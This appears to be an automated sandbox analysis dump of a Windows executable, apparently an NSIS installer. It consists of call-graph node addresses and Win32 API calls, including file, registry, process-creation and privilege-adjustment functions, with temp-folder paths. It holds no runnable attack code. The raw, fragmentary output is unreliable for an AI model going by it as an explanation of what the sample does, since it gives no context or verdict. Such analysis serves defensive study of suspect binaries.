5218->5215 5219 6fdf2349 5220 6fdf23b3 5219->5220 5221 6fdf23be GlobalAlloc 5220->5221 5222 6fdf23dd 5220->5222 5221->5220 5223 401956 5224 402d3e 17 API calls 5223->5224 5225 40195d lstrlenW 5224->5225 5226 402630 5225->5226 4980 4014d7 4985 402d1c 4980->4985 4982 4014dd Sleep 4984 402bc2 4982->4984 4986 40642b 17 API calls 4985->4986 4987 402d31 4986->4987 4987->4982 5011 40175c 5012 402d3e 17 API calls 5011->5012 5013 401763 5012->5013 5014 405f13 2 API calls 5013->5014 5015 40176a 5014->5015 5016 405f13 2 API calls 5015->5016 5016->5015 5227 401d5d 5228 402d1c 17 API calls 5227->5228 5229 401d6e SetWindowLongW 5228->5229 5230 402bc2 5229->5230 5017 401ede 5018 402d1c 17 API calls 5017->5018 5019 401ee4 5018->5019 5020 402d1c 17 API calls 5019->5020 5021 401ef0 5020->5021 5022 401f07 EnableWindow 5021->5022 5023 401efc ShowWindow 5021->5023 5024 402bc2 5022->5024 5023->5024 5231 401563 5232 402b08 5231->5232 5235 406335 wsprintfW 5232->5235 5234 402b0d 5235->5234 5236 4026e4 5237 402d1c 17 API calls 5236->5237 5238 4026f3 5237->5238 5239 40273d ReadFile 5238->5239 5240 405f67 ReadFile 5238->5240 5241 402832 5238->5241 5242 40277d MultiByteToWideChar 5238->5242 5245 4027a3 SetFilePointer MultiByteToWideChar 5238->5245 5246 402843 5238->5246 5248 402830 5238->5248 5249 405fc5 SetFilePointer 5238->5249 5239->5238 5239->5248 5240->5238 5258 406335 wsprintfW 5241->5258 5242->5238 5245->5238 5247 402864 SetFilePointer 5246->5247 5246->5248 5247->5248 5250 405fe1 5249->5250 5257 405ff9 5249->5257 5251 405f67 ReadFile 5250->5251 5252 405fed 5251->5252 5253 406002 SetFilePointer 5252->5253 5254 40602a SetFilePointer 5252->5254 5252->5257 5253->5254 5255 40600d 5253->5255 5254->5257 5256 405f96 WriteFile 5255->5256 5256->5257 5257->5238 5258->5248 5259 401968 5260 402d1c 17 API calls 5259->5260 5261 40196f 5260->5261 5262 402d1c 17 API calls 5261->5262 5263 40197c 5262->5263 5264 402d3e 17 API calls 5263->5264 5265 401993 lstrlenW 5264->5265 5267 4019a4 5265->5267 5266 
4019e5 5267->5266 5271 4063ee lstrcpynW 5267->5271 5269 4019d5 5269->5266 5270 4019da lstrlenW 5269->5270 5270->5266 5271->5269 5272 40166a 5273 402d3e 17 API calls 5272->5273 5274 401670 5273->5274 5275 40674c 2 API calls 5274->5275 5276 401676 5275->5276 4565 403e6b 4566 403e83 4565->4566 4567 403fbe 4565->4567 4566->4567 4568 403e8f 4566->4568 4569 403fcf GetDlgItem GetDlgItem 4567->4569 4578 40400f 4567->4578 4570 403e9a SetWindowPos 4568->4570 4571 403ead 4568->4571 4572 404344 18 API calls 4569->4572 4570->4571 4575 403eb2 ShowWindow 4571->4575 4576 403eca 4571->4576 4577 403ff9 SetClassLongW 4572->4577 4573 404069 4574 404390 SendMessageW 4573->4574 4584 403fb9 4573->4584 4609 40407b 4574->4609 4575->4576 4580 403ed2 DestroyWindow 4576->4580 4581 403eec 4576->4581 4582 40140b 2 API calls 4577->4582 4578->4573 4579 401389 2 API calls 4578->4579 4583 404041 4579->4583 4585 4042cd 4580->4585 4586 403ef1 SetWindowLongW 4581->4586 4587 403f02 4581->4587 4582->4578 4583->4573 4588 404045 SendMessageW 4583->4588 4585->4584 4596 4042fe ShowWindow 4585->4596 4586->4584 4591 403fab 4587->4591 4592 403f0e GetDlgItem 4587->4592 4588->4584 4589 40140b 2 API calls 4589->4609 4590 4042cf DestroyWindow EndDialog 4590->4585 4645 4043ab 4591->4645 4593 403f21 SendMessageW IsWindowEnabled 4592->4593 4594 403f3e 4592->4594 4593->4584 4593->4594 4598 403f4b 4594->4598 4599 403f92 SendMessageW 4594->4599 4600 403f5e 4594->4600 4610 403f43 4594->4610 4596->4584 4597 40642b 17 API calls 4597->4609 4598->4599 4598->4610 4599->4591 4603 403f66 4600->4603 4604 403f7b 4600->4604 4602 404344 18 API calls 4602->4609 4607 40140b 2 API calls 4603->4607 4606 40140b 2 API calls 4604->4606 4605 403f79 4605->4591 4608 403f82 4606->4608 4607->4610 4608->4591 4608->4610 4609->4584 4609->4589 4609->4590 4609->4597 4609->4602 4627 40420f DestroyWindow 4609->4627 4636 404344 4609->4636 4642 40431d 4610->4642 4612 4040f6 GetDlgItem 4613 404113 ShowWindow KiUserCallbackDispatcher 4612->4613 4614 
40410b 4612->4614 4639 404366 KiUserCallbackDispatcher 4613->4639 4614->4613 4616 40413d EnableWindow 4621 404151 4616->4621 4617 404156 GetSystemMenu EnableMenuItem SendMessageW 4618 404186 SendMessageW 4617->4618 4617->4621 4618->4621 4620 403e4c 18 API calls 4620->4621 4621->4617 4621->4620 4640 404379 SendMessageW 4621->4640 4641 4063ee lstrcpynW 4621->4641 4623 4041b5 lstrlenW 4624 40642b 17 API calls 4623->4624 4625 4041cb SetWindowTextW 4624->4625 4626 401389 2 API calls 4625->4626 4626->4609 4627->4585 4628 404229 CreateDialogParamW 4627->4628 4628->4585 4629 40425c 4628->4629 4630 404344 18 API calls 4629->4630 4631 404267 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4630->4631 4632 401389 2 API calls 4631->4632 4633 4042ad 4632->4633 4633->4584 4634 4042b5 ShowWindow 4633->4634 4635 404390 SendMessageW 4634->4635 4635->4585 4637 40642b 17 API calls 4636->4637 4638 40434f SetDlgItemTextW 4637->4638 4638->4612 4639->4616 4640->4621 4641->4623 4643 404324 4642->4643 4644 40432a SendMessageW 4642->4644 4643->4644 4644->4605 4646 40446e 4645->4646 4647 4043c3 GetWindowLongW 4645->4647 4646->4584 4647->4646 4648 4043d8 4647->4648 4648->4646 4649 404405 GetSysColor 4648->4649 4650 404408 4648->4650 4649->4650 4651 404418 SetBkMode 4650->4651 4652 40440e SetTextColor 4650->4652 4653 404430 GetSysColor 4651->4653 4654 404436 4651->4654 4652->4651 4653->4654 4655 404447 4654->4655 4656 40443d SetBkColor 4654->4656 4655->4646 4657 404461 CreateBrushIndirect 4655->4657 4658 40445a DeleteObject 4655->4658 4656->4655 4657->4646 4658->4657 5277 4023ec 5278 402d3e 17 API calls 5277->5278 5279 4023fb 5278->5279 5280 402d3e 17 API calls 5279->5280 5281 402404 5280->5281 5282 402d3e 17 API calls 5281->5282 5283 40240e GetPrivateProfileStringW 5282->5283 5284 4047ee 5285 404824 5284->5285 5286 4047fe 5284->5286 5288 4043ab 8 API calls 5285->5288 5287 404344 18 API calls 5286->5287 5289 40480b SetDlgItemTextW 5287->5289 5290 404830 5288->5290 5289->5285 4690 40176f 
4691 402d3e 17 API calls 4690->4691 4692 401776 4691->4692 4693 401796 4692->4693 4694 40179e 4692->4694 4729 4063ee lstrcpynW 4693->4729 4730 4063ee lstrcpynW 4694->4730 4697 40179c 4700 40669d 5 API calls 4697->4700 4698 4017a9 4699 405cc3 3 API calls 4698->4699 4701 4017af lstrcatW 4699->4701 4718 4017bb 4700->4718 4701->4697 4702 40674c 2 API calls 4702->4718 4703 405ebf 2 API calls 4703->4718 4705 4017cd CompareFileTime 4705->4718 4706 40188d 4707 405456 24 API calls 4706->4707 4709 401897 4707->4709 4708 401864 4710 405456 24 API calls 4708->4710 4717 401879 4708->4717 4712 40324c 31 API calls 4709->4712 4710->4717 4711 4063ee lstrcpynW 4711->4718 4713 4018aa 4712->4713 4714 4018be SetFileTime 4713->4714 4716 4018d0 CloseHandle 4713->4716 4714->4716 4715 40642b 17 API calls 4715->4718 4716->4717 4719 4018e1 4716->4719 4718->4702 4718->4703 4718->4705 4718->4706 4718->4708 4718->4711 4718->4715 4724 405a54 MessageBoxIndirectW 4718->4724 4728 405ee4 GetFileAttributesW CreateFileW 4718->4728 4720 4018e6 4719->4720 4721 4018f9 4719->4721 4722 40642b 17 API calls 4720->4722 4723 40642b 17 API calls 4721->4723 4725 4018ee lstrcatW 4722->4725 4726 401901 4723->4726 4724->4718 4725->4726 4726->4717 4727 405a54 MessageBoxIndirectW 4726->4727 4727->4717 4728->4718 4729->4697 4730->4698 5291 401a72 5292 402d1c 17 API calls 5291->5292 5293 401a7b 5292->5293 5294 402d1c 17 API calls 5293->5294 5295 401a20 5294->5295 5296 6fdf166d 5297 6fdf1516 GlobalFree 5296->5297 5300 6fdf1685 5297->5300 5298 6fdf16cb GlobalFree 5299 6fdf16a0 5299->5298 5300->5298 5300->5299 5301 6fdf16b7 VirtualFree 5300->5301 5301->5298 4925 401573 4926 401583 ShowWindow 4925->4926 4927 40158c 4925->4927 4926->4927 4928 40159a ShowWindow 4927->4928 4929 402bc2 4927->4929 4928->4929 5302 4014f5 SetForegroundWindow 5303 402bc2 5302->5303 5304 401ff6 5305 402d3e 17 API calls 5304->5305 5306 401ffd 5305->5306 5307 40674c 2 API calls 5306->5307 5308 402003 5307->5308 5310 402014 5308->5310 5311 406335 
wsprintfW 5308->5311 5311->5310 5312 4022f7 5313 402d3e 17 API calls 5312->5313 5314 4022fd 5313->5314 5315 402d3e 17 API calls 5314->5315 5316 402306 5315->5316 5317 402d3e 17 API calls 5316->5317 5318 40230f 5317->5318 5319 40674c 2 API calls 5318->5319 5320 402318 5319->5320 5321 402329 lstrlenW lstrlenW 5320->5321 5325 40231c 5320->5325 5323 405456 24 API calls 5321->5323 5322 405456 24 API calls 5326 402324 5322->5326 5324 402367 SHFileOperationW 5323->5324 5324->5325 5324->5326 5325->5322 5325->5326 5327 401b77 5328 402d3e 17 API calls 5327->5328 5329 401b7e 5328->5329 5330 402d1c 17 API calls 5329->5330 5331 401b87 wsprintfW 5330->5331 5332 402bc2 5331->5332 5333 40447a lstrcpynW lstrlenW 5334 40167b 5335 402d3e 17 API calls 5334->5335 5336 401682 5335->5336 5337 402d3e 17 API calls 5336->5337 5338 40168b 5337->5338 5339 402d3e 17 API calls 5338->5339 5340 401694 MoveFileW 5339->5340 5341 4016a7 5340->5341 5347 4016a0 5340->5347 5342 40674c 2 API calls 5341->5342 5344 4022ee 5341->5344 5345 4016b6 5342->5345 5343 401423 24 API calls 5343->5344 5345->5344 5346 4061b4 36 API calls 5345->5346 5346->5347 5347->5343 5348 403a7b 5349 403a86 5348->5349 5350 403a8a 5349->5350 5351 403a8d GlobalAlloc 5349->5351 5351->5350 5352 40237b 5353 402382 5352->5353 5356 402395 5352->5356 5354 40642b 17 API calls 5353->5354 5355 40238f 5354->5355 5355->5356 5357 405a54 MessageBoxIndirectW 5355->5357 5357->5356 5358 6fdf10e1 5359 6fdf1111 5358->5359 5360 6fdf11d8 GlobalFree 5359->5360 5361 6fdf12ba 2 API calls 5359->5361 5362 6fdf11d3 5359->5362 5363 6fdf1164 GlobalAlloc 5359->5363 5364 6fdf11f8 GlobalFree 5359->5364 5365 6fdf1272 2 API calls 5359->5365 5366 6fdf12e1 lstrcpyW 5359->5366 5367 6fdf11c4 GlobalFree 5359->5367 5361->5359 5362->5360 5363->5359 5364->5359 5365->5367 5366->5359 5367->5359 5368 4019ff 5369 402d3e 17 API calls 5368->5369 5370 401a06 5369->5370 5371 402d3e 17 API calls 5370->5371 5372 401a0f 5371->5372 5373 401a16 lstrcmpiW 5372->5373 5374 401a28 lstrcmpW 
5372->5374 5375 401a1c 5373->5375 5374->5375 5376 401000 5377 401037 BeginPaint GetClientRect 5376->5377 5378 40100c DefWindowProcW 5376->5378 5380 4010f3 5377->5380 5381 401179 5378->5381 5382 401073 CreateBrushIndirect FillRect DeleteObject 5380->5382 5383 4010fc 5380->5383 5382->5380 5384 401102 CreateFontIndirectW 5383->5384 5385 401167 EndPaint 5383->5385 5384->5385 5386 401112 6 API calls 5384->5386 5385->5381 5386->5385 5387 401d81 5388 401d94 GetDlgItem 5387->5388 5389 401d87 5387->5389 5391 401d8e 5388->5391 5390 402d1c 17 API calls 5389->5390 5390->5391 5392 401dd5 GetClientRect LoadImageW SendMessageW 5391->5392 5393 402d3e 17 API calls 5391->5393 5395 401e33 5392->5395 5397 401e3f 5392->5397 5393->5392 5396 401e38 DeleteObject 5395->5396 5395->5397 5396->5397 5398 402482 5399 402d3e 17 API calls 5398->5399 5400 402494 5399->5400 5401 402d3e 17 API calls 5400->5401 5402 40249e 5401->5402 5415 402dce 5402->5415 5405 402bc2 5406 4024d6 5407 4024e2 5406->5407 5409 402d1c 17 API calls 5406->5409 5410 402501 RegSetValueExW 5407->5410 5412 40324c 31 API calls 5407->5412 5408 402d3e 17 API calls 5411 4024cc lstrlenW 5408->5411 5409->5407 5413 402517 RegCloseKey 5410->5413 5411->5406 5412->5410 5413->5405 5416 402de9 5415->5416 5419 406289 5416->5419 5420 406298 5419->5420 5421 4062a3 RegCreateKeyExW 5420->5421 5422 4024ae 5420->5422 5421->5422 5422->5405 5422->5406 5422->5408 5423 402902 5424 402d3e 17 API calls 5423->5424 5425 402909 FindFirstFileW 5424->5425 5426 402931 5425->5426 5429 40291c 5425->5429 5427 40293a 5426->5427 5431 406335 wsprintfW 5426->5431 5432 4063ee lstrcpynW 5427->5432 5431->5427 5432->5429 5433 401503 5434 40150b 5433->5434 5436 40151e 5433->5436 5435 402d1c 17 API calls 5434->5435 5435->5436 5437 404503 5438 40451b 5437->5438 5444 404635 5437->5444 5445 404344 18 API calls 5438->5445 5439 40469f 5440 404769 5439->5440 5441 4046a9 GetDlgItem 5439->5441 5447 4043ab 8 API calls 5440->5447 5442 4046c3 5441->5442 5443 40472a 5441->5443 
5442->5443 5451 4046e9 SendMessageW LoadCursorW SetCursor 5442->5451 5443->5440 5452 40473c 5443->5452 5444->5439 5444->5440 5448 404670 GetDlgItem SendMessageW 5444->5448 5446 404582 5445->5446 5449 404344 18 API calls 5446->5449 5450 404764 5447->5450 5470 404366 KiUserCallbackDispatcher 5448->5470 5454 40458f CheckDlgButton 5449->5454 5474 4047b2 5451->5474 5456 404752 5452->5456 5457 404742 SendMessageW 5452->5457 5468 404366 KiUserCallbackDispatcher 5454->5468 5456->5450 5462 404758 SendMessageW 5456->5462 5457->5456 5458 40469a 5471 40478e 5458->5471 5462->5450 5463 4045ad GetDlgItem 5469 404379 SendMessageW 5463->5469 5465 4045c3 SendMessageW 5466 4045e0 GetSysColor 5465->5466 5467 4045e9 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5465->5467 5466->5467 5467->5450 5468->5463 5469->5465 5470->5458 5472 4047a1 SendMessageW 5471->5472 5473 40479c 5471->5473 5472->5439 5473->5472 5477 405a1a ShellExecuteExW 5474->5477 5476 404718 LoadCursorW SetCursor 5476->5443 5477->5476 5478 402889 5479 402890 5478->5479 5485 402b0d 5478->5485 5480 402d1c 17 API calls 5479->5480 5481 402897 5480->5481 5482 4028a6 SetFilePointer 5481->5482 5483 4028b6 5482->5483 5482->5485 5486 406335 wsprintfW 5483->5486 5486->5485 5487 404b8b 5488 404bb7 5487->5488 5489 404b9b 5487->5489 5491 404bea 5488->5491 5492 404bbd SHGetPathFromIDListW 5488->5492 5498 405a38 GetDlgItemTextW 5489->5498 5493 404bd4 SendMessageW 5492->5493 5494 404bcd 5492->5494 5493->5491 5496 40140b 2 API calls 5494->5496 5495 404ba8 SendMessageW 5495->5488 5496->5493 5498->5495 5499 40190c 5500 401943 5499->5500 5501 402d3e 17 API calls 5500->5501 5502 401948 5501->5502 5503 405b00 67 API calls 5502->5503 5504 401951 5503->5504 5505 40190f 5506 402d3e 17 API calls 5505->5506 5507 401916 5506->5507 5508 405a54 MessageBoxIndirectW 5507->5508 5509 40191f 5508->5509 5510 401491 5511 405456 24 API calls 5510->5511 5512 401498 5511->5512 5513 401f12 5514 402d3e 17 API calls 5513->5514 5515 401f18 5514->5515 
5516 402d3e 17 API calls 5515->5516 5517 401f21 5516->5517 5518 402d3e 17 API calls 5517->5518 5519 401f2a 5518->5519 5520 402d3e 17 API calls 5519->5520 5521 401f33 5520->5521 5522 401423 24 API calls 5521->5522 5523 401f3a 5522->5523 5530 405a1a ShellExecuteExW 5523->5530 5525 401f82 5526 402925 5525->5526 5531 40688e WaitForSingleObject 5525->5531 5528 401f9f CloseHandle 5528->5526 5530->5525 5532 4068a8 5531->5532 5533 4068ba GetExitCodeProcess 5532->5533 5534 40681f 2 API calls 5532->5534 5533->5528 5535 4068af WaitForSingleObject 5534->5535 5535->5532 5536 402614 5537 402d3e 17 API calls 5536->5537 5538 40261b 5537->5538 5541 405ee4 GetFileAttributesW CreateFileW 5538->5541 5540 402627 5541->5540 4930 405595 4931 4055b6 GetDlgItem GetDlgItem GetDlgItem 4930->4931 4932 40573f 4930->4932 4976 404379 SendMessageW 4931->4976 4934 405770 4932->4934 4935 405748 GetDlgItem CreateThread CloseHandle 4932->4935 4937 40579b 4934->4937 4939 4057c0 4934->4939 4940 405787 ShowWindow ShowWindow 4934->4940 4935->4934 4979 405529 5 API calls 4935->4979 4936 405626 4944 40562d GetClientRect GetSystemMetrics SendMessageW SendMessageW 4936->4944 4938 4057a7 4937->4938 4945 4057fb 4937->4945 4941 4057d5 ShowWindow 4938->4941 4942 4057af 4938->4942 4943 4043ab 8 API calls 4939->4943 4978 404379 SendMessageW 4940->4978 4949 4057f5 4941->4949 4950 4057e7 4941->4950 4947 40431d SendMessageW 4942->4947 4948 4057ce 4943->4948 4951 40569b 4944->4951 4952 40567f SendMessageW SendMessageW 4944->4952 4945->4939 4953 405809 SendMessageW 4945->4953 4947->4939 4955 40431d SendMessageW 4949->4955 4954 405456 24 API calls 4950->4954 4956 4056a0 SendMessageW 4951->4956 4957 4056ae 4951->4957 4952->4951 4953->4948 4958 405822 CreatePopupMenu 4953->4958 4954->4949 4955->4945 4956->4957 4960 404344 18 API calls 4957->4960 4959 40642b 17 API calls 4958->4959 4961 405832 AppendMenuW 4959->4961 4962 4056be 4960->4962 4963 405862 TrackPopupMenu 4961->4963 4964 40584f GetWindowRect 4961->4964 4965 
4056c7 ShowWindow 4962->4965 4966 4056fb GetDlgItem SendMessageW 4962->4966 4963->4948 4967 40587d 4963->4967 4964->4963 4968 4056ea 4965->4968 4969 4056dd ShowWindow 4965->4969 4966->4948 4970 405722 SendMessageW SendMessageW 4966->4970 4971 405899 SendMessageW 4967->4971 4977 404379 SendMessageW 4968->4977 4969->4968 4970->4948 4971->4971 4972 4058b6 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4971->4972 4974 4058db SendMessageW 4972->4974 4974->4974 4975 405904 GlobalUnlock SetClipboardData CloseClipboard 4974->4975 4975->4948 4976->4936 4977->4966 4978->4937 5542 402596 5543 402d7e 17 API calls 5542->5543 5544 4025a0 5543->5544 5545 402d1c 17 API calls 5544->5545 5546 4025a9 5545->5546 5547 4025d1 RegEnumValueW 5546->5547 5548 4025c5 RegEnumKeyW 5546->5548 5549 402925 5546->5549 5550 4025e6 RegCloseKey 5547->5550 5548->5550 5550->5549 5552 401d17 5553 402d1c 17 API calls 5552->5553 5554 401d1d IsWindow 5553->5554 5555 401a20 5554->5555 4988 401b9b 4989 401bec 4988->4989 4994 401ba8 4988->4994 4990 401c16 GlobalAlloc 4989->4990 4991 401bf1 4989->4991 4993 40642b 17 API calls 4990->4993 5001 402395 4991->5001 5009 4063ee lstrcpynW 4991->5009 4992 40642b 17 API calls 4996 40238f 4992->4996 4997 401c31 4993->4997 4994->4997 4998 401bbf 4994->4998 4996->5001 5002 405a54 MessageBoxIndirectW 4996->5002 4997->4992 4997->5001 5007 4063ee lstrcpynW 4998->5007 4999 401c03 GlobalFree 4999->5001 5002->5001 5003 401bce 5008 4063ee lstrcpynW 5003->5008 5005 401bdd 5010 4063ee lstrcpynW 5005->5010 5007->5003 5008->5005 5009->4999 5010->5001 5556 402b9d SendMessageW 5557 402bc2 5556->5557 5558 402bb7 InvalidateRect 5556->5558 5558->5557 5559 40149e 5560 402395 5559->5560 5561 4014ac PostQuitMessage 5559->5561 5561->5560 5562 6fdf1000 5565 6fdf101b 5562->5565 5566 6fdf1516 GlobalFree 5565->5566 5567 6fdf1020 5566->5567 5568 6fdf1027 GlobalAlloc 5567->5568 5569 6fdf1024 5567->5569 5568->5569 5570 6fdf153d 3 API calls 5569->5570 5571 6fdf1019 5570->5571 4260 4034a2 
SetErrorMode GetVersion 4261 4034e1 4260->4261 4262 4034e7 4260->4262 4263 4067e3 5 API calls 4261->4263 4264 406773 3 API calls 4262->4264 4263->4262 4265 4034fd lstrlenA 4264->4265 4265->4262 4266 40350d 4265->4266 4267 4067e3 5 API calls 4266->4267 4268 403514 4267->4268 4269 4067e3 5 API calls 4268->4269 4270 40351b 4269->4270 4271 4067e3 5 API calls 4270->4271 4272 403527 #17 OleInitialize SHGetFileInfoW 4271->4272 4350 4063ee lstrcpynW 4272->4350 4275 403573 GetCommandLineW 4351 4063ee lstrcpynW 4275->4351 4277 403585 4278 405cf0 CharNextW 4277->4278 4279 4035aa CharNextW 4278->4279 4280 4036d4 GetTempPathW 4279->4280 4288 4035c3 4279->4288 4352 403471 4280->4352 4282 4036ec 4283 4036f0 GetWindowsDirectoryW lstrcatW 4282->4283 4284 403746 DeleteFileW 4282->4284 4285 403471 12 API calls 4283->4285 4362 403015 GetTickCount GetModuleFileNameW 4284->4362 4289 40370c 4285->4289 4286 405cf0 CharNextW 4286->4288 4288->4286 4293 4036bf 4288->4293 4295 4036bd 4288->4295 4289->4284 4291 403710 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4289->4291 4290 40375a 4299 405cf0 CharNextW 4290->4299 4303 40380d 4290->4303 4334 4037fd 4290->4334 4294 403471 12 API calls 4291->4294 4446 4063ee lstrcpynW 4293->4446 4297 40373e 4294->4297 4295->4280 4297->4284 4297->4303 4313 403779 4299->4313 4301 403947 4305 4039cb ExitProcess 4301->4305 4306 40394f GetCurrentProcess OpenProcessToken 4301->4306 4302 403827 4456 405a54 4302->4456 4449 4039e3 4303->4449 4311 403967 LookupPrivilegeValueW AdjustTokenPrivileges 4306->4311 4312 40399b 4306->4312 4309 4037d7 4314 405dcb 18 API calls 4309->4314 4310 40383d 4315 4059bf 5 API calls 4310->4315 4311->4312 4316 4067e3 5 API calls 4312->4316 4313->4309 4313->4310 4317 4037e3 4314->4317 4318 403842 lstrcatW 4315->4318 4319 4039a2 4316->4319 4317->4303 4447 4063ee lstrcpynW 4317->4447 4320 403853 lstrcatW 4318->4320 4321 40385e lstrcatW lstrcmpiW 4318->4321 4322 4039b7 ExitWindowsEx 4319->4322 4323 4039c4 4319->4323 
4320->4321 4321->4303 4325 40387a 4321->4325 4322->4305 4322->4323 4465 40140b 4323->4465 4328 403886 4325->4328 4329 40387f 4325->4329 4327 4037f2 4448 4063ee lstrcpynW 4327->4448 4330 4059a2 2 API calls 4328->4330 4332 405925 4 API calls 4329->4332 4333 40388b SetCurrentDirectoryW 4330->4333 4335 403884 4332->4335 4336 4038a6 4333->4336 4337 40389b 4333->4337 4390 403abd 4334->4390 4335->4333 4461 4063ee lstrcpynW 4336->4461 4460 4063ee lstrcpynW 4337->4460 4340 40642b 17 API calls 4341 4038e5 DeleteFileW 4340->4341 4342 4038f2 CopyFileW 4341->4342 4347 4038b4 4341->4347 4342->4347 4343 40393b 4344 4061b4 36 API calls 4343->4344 4344->4303 4345 4061b4 36 API calls 4345->4347 4346 40642b 17 API calls 4346->4347 4347->4340 4347->4343 4347->4345 4347->4346 4349 403926 CloseHandle 4347->4349 4462 4059d7 CreateProcessW 4347->4462 4349->4347 4350->4275 4351->4277 4353 40669d 5 API calls 4352->4353 4355 40347d 4353->4355 4354 403487 4354->4282 4355->4354 4356 405cc3 3 API calls 4355->4356 4357 40348f 4356->4357 4358 4059a2 2 API calls 4357->4358 4359 403495 4358->4359 4468 405f13 4359->4468 4472 405ee4 GetFileAttributesW CreateFileW 4362->4472 4364 403055 4385 403065 4364->4385 4473 4063ee lstrcpynW 4364->4473 4366 40307b 4367 405d0f 2 API calls 4366->4367 4368 403081 4367->4368 4474 4063ee lstrcpynW 4368->4474 4370 40308c GetFileSize 4371 403186 4370->4371 4383 4030a3 4370->4383 4475 402fb1 4371->4475 4373 40318f 4375 4031bf GlobalAlloc 4373->4375 4373->4385 4510 40345a SetFilePointer 4373->4510 4486 40345a SetFilePointer 4375->4486 4376 4031f2 4381 402fb1 6 API calls 4376->4381 4379 4031a8 4382 403444 ReadFile 4379->4382 4380 4031da 4487 40324c 4380->4487 4381->4385 4386 4031b3 4382->4386 4383->4371 4383->4376 4383->4385 4387 402fb1 6 API calls 4383->4387 4507 403444 4383->4507 4385->4290 4386->4375 4386->4385 4387->4383 4388 4031e6 4388->4385 4388->4388 4389 403223 SetFilePointer 4388->4389 4389->4385 4391 4067e3 5 API calls 4390->4391 4392 403ad1 4391->4392 4393 
403ad7 GetUserDefaultUILanguage 4392->4393 4394 403ae9 4392->4394 4516 406335 wsprintfW 4393->4516 4395 4062bc 3 API calls 4394->4395 4397 403b19 4395->4397 4399 403b38 lstrcatW 4397->4399 4400 4062bc 3 API calls 4397->4400 4398 403ae7 4517 403d93 4398->4517 4399->4398 4400->4399 4403 405dcb 18 API calls 4404 403b6a 4403->4404 4405 403bfe 4404->4405 4407 4062bc 3 API calls 4404->4407 4406 405dcb 18 API calls 4405->4406 4408 403c04 4406->4408 4409 403b9c 4407->4409 4410 403c14 LoadImageW 4408->4410 4411 40642b 17 API calls 4408->4411 4409->4405 4417 403bbd lstrlenW 4409->4417 4418 405cf0 CharNextW 4409->4418 4412 403cba 4410->4412 4413 403c3b RegisterClassW 4410->4413 4411->4410 4416 40140b 2 API calls 4412->4416 4414 403c71 SystemParametersInfoW CreateWindowExW 4413->4414 4415 403cc4 4413->4415 4414->4412 4415->4303 4421 403cc0 4416->4421 4419 403bf1 4417->4419 4420 403bcb lstrcmpiW 4417->4420 4422 403bba 4418->4422 4424 405cc3 3 API calls 4419->4424 4420->4419 4423 403bdb GetFileAttributesW 4420->4423 4421->4415 4426 403d93 18 API calls 4421->4426 4422->4417 4425 403be7 4423->4425 4427 403bf7 4424->4427 4425->4419 4428 405d0f 2 API calls 4425->4428 4429 403cd1 4426->4429 4532 4063ee lstrcpynW 4427->4532 4428->4419 4431 403d60 4429->4431 4432 403cdd ShowWindow 4429->4432 4525 405529 OleInitialize 4431->4525 4434 406773 3 API calls 4432->4434 4436 403cf5 4434->4436 4435 403d66 4437 403d82 4435->4437 4438 403d6a 4435->4438 4439 403d03 GetClassInfoW 4436->4439 4443 406773 3 API calls 4436->4443 4442 40140b 2 API calls 4437->4442 4438->4415 4445 40140b 2 API calls 4438->4445 4440 403d17 GetClassInfoW RegisterClassW 4439->4440 4441 403d2d DialogBoxParamW 4439->4441 4440->4441 4444 40140b 2 API calls 4441->4444 4442->4415 4443->4439 4444->4415 4445->4415 4446->4295 4447->4327 4448->4334 4450 4039fb 4449->4450 4451 4039ed CloseHandle 4449->4451 4544 403a28 4450->4544 4451->4450 4454 405b00 67 API calls 4455 403816 OleUninitialize 4454->4455 4455->4301 4455->4302 4457 

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                • SetErrorMode.KERNELBASE ref: 004034C5
                                                                                                                                                                                • GetVersion.KERNEL32 ref: 004034CB
                                                                                                                                                                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034FE
                                                                                                                                                                                • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 0040353B
                                                                                                                                                                                • OleInitialize.OLE32(00000000), ref: 00403542
                                                                                                                                                                                • SHGetFileInfoW.SHELL32(0079FF08,00000000,?,000002B4,00000000), ref: 0040355E
                                                                                                                                                                                • GetCommandLineW.KERNEL32(007A7A60,NSIS Error,?,00000007,00000009,0000000B), ref: 00403573
                                                                                                                                                                                • CharNextW.USER32(00000000,"C:\Users\user\Desktop\02Eh1ah35H.exe",00000020,"C:\Users\user\Desktop\02Eh1ah35H.exe",00000000,?,00000007,00000009,0000000B), ref: 004035AB
                                                                                                                                                                                  • Part of subcall function 004067E3: GetModuleHandleA.KERNEL32(?,00000020,?,00403514,0000000B), ref: 004067F5
                                                                                                                                                                                  • Part of subcall function 004067E3: GetProcAddress.KERNEL32(00000000,?), ref: 00406810
                                                                                                                                                                                • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004036E5
                                                                                                                                                                                • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 004036F6
                                                                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403702
                                                                                                                                                                                • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403716
                                                                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040371E
                                                                                                                                                                                • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040372F
                                                                                                                                                                                • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 00403737
                                                                                                                                                                                • DeleteFileW.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 0040374B
                                                                                                                                                                                  • Part of subcall function 004063EE: lstrcpynW.KERNEL32(?,?,00000400,00403573,007A7A60,NSIS Error,?,00000007,00000009,0000000B), ref: 004063FB
                                                                                                                                                                                • OleUninitialize.OLE32(00000007,?,00000007,00000009,0000000B), ref: 00403816
